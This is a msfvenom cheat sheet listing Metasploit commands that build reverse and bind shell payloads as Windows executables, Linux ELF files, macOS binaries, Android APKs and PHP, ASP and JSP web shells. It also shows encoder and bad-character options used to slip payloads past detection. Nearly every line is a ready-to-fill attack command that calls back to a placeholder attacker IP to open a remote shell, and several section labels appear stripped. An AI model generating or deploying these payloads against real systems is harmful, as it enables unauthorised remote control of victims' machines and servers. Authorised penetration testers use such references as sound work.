Basic Usage
msfvenom -p <payload> [options] > <output_file>
Common Payloads
Windows Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe > shell.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST=<target_ip> LPORT=<bind_port> -f exe > bind.exe
- Windows Reverse HTTPS Shell:
msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker_ip> LPORT=<attacker_port> -f exe > shell_https.exe
Linux Payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<target_ip> LPORT=<bind_port> -f elf > bind.elf
macOS Payloads
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f macho > shell.macho
Android Payloads
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > shell.apk
Web Payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw > shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw > shell.jsp
- EXE (Windows Executable):
-f exe
-f elf
-f apk
- Macho (macOS Executable):
-f macho
-f raw
Encoding Payloads
msfvenom --list encoders
msfvenom -p <payload> -e <encoder> -f <format> > <output_file>
- Common Encoder Example (Shikata Ga Nai):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -e x86/shikata_ga_nai -f exe > encoded_shell.exe
Additional Options
- Bad Characters (Avoid Specific Bytes):
msfvenom -p <payload> -b "\x00\xff" -f <format> > <output_file>
msfvenom -p <payload> -n <number_of_nops> -f <format> > <output_file>
msfvenom --list payloads